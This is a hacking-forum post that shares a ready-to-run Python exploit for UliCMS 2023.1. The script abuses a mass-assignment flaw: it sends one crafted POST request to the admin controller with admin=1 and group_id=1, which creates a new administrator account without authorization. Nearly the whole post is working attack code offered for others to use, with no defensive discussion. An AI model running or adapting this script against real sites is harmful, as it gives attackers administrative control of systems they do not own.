• 🌙 Community Spirit

    Ramadan Mubarak! To honor this month, Crax has paused NSFW categories. Wishing you peace and growth!

Multi/Others Ulicms-create admin user via mass assignment Vulnerability (1 Viewer)

Currently reading:
 Multi/Others Ulicms-create admin user via mass assignment Vulnerability (1 Viewer)

Recently searched:

0dayhacker

Member
LV
1
Joined
Jul 8, 2023
Threads
13
Likes
11
Awards
4
Credits
1,441©
Cash
0$

Ulicms 2023.1 - create admin user via mass assignment
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: create admin user via mass assignment
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Tested on: Linux
-----------------------------------------------------------------------------------------
##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna


Python:
import requests

 

new_name=input("name: ")

new_email=input("email: ")

new_pass=input("password: ")

 

url = "http://localhost/dist/admin/index.php"

 

headers = {"Content-Type": "application/x-www-form-urlencoded"}

 

data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="

 

response = requests.post(url, headers=headers, data=data)

 

if response.status_code == 200:

    print("Request is success and created new admin account")

    

else:

    print("Request is failure.!!")


-----------------------------------------------------------------------------------
#POC video :



like this post and reply thanks for you
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
ADD AN IMAGE HERE! [Not adding an image will result in removal]
Then remove these lines.

Download:




1
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Recently searched:

Similar threads

Users who are viewing this thread

Top Bottom